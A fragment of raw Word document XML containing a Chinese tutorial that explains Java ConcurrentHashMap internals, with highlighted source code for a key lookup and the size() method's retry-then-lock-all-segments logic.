    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (count != </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) { </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>// read-volatile</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4"/>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HashEntry&lt;K,V&gt; e = getFirst(hash);  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>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while</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (e != </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</w:t>
      </w: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4"/>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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (e.hash == hash &amp;&amp; key.equals(e.key))  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>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lastRenderedPageBreak/>
        <w:t>                </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>return</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true</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4"/>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e = e.next;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>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4"/>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4"/>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return</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false</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4"/>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p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00573A3A">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>跨段操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>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有些操作需要涉及到多个段，比如说</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>size(), containsValaue()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。先来看下</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>size()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>public</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> size() {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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final</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> Segment&lt;K,V&gt;[] segments = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.segments;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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long</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> sum = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</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long</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> check = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>[] mc = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>new</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>[segments.length];  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>// Try a few times to get accurate count. On failure due to</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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>// continuous async changes in table, resort to locking.</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for</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> k = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>; k &lt; RETRIES_BEFORE_LOCK; ++k) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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check = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</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sum = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> mcsum = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</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for</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> i = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>; i &lt; segments.length; ++i) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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sum += segments[i].count;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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mcsum += mc[i] = segments[i].modCount;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (mcsum != </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w: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for</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> i = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>; i &lt; segments.length; ++i) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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check += segments[i].count;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (mc[i] != segments[i].modCount) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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check = -</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>1</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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>// force retry</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break</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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (check == sum)  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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break</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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (check != sum) { </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>// Resort to locking all segments</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sum = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</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for</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> i = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>; i &lt; segments.length; ++i)  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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segments[i].lock();  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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for</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> i = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>; i &lt; segments.length; ++i)  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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sum += segments[i].count;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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lastRenderedPageBreak/>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>for</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> i = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>; i &lt; segments.length; ++i)  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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segments[i].unlock();  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (sum &gt; Integer.MAX_VALUE)  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> Integer.MAX_VALUE;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
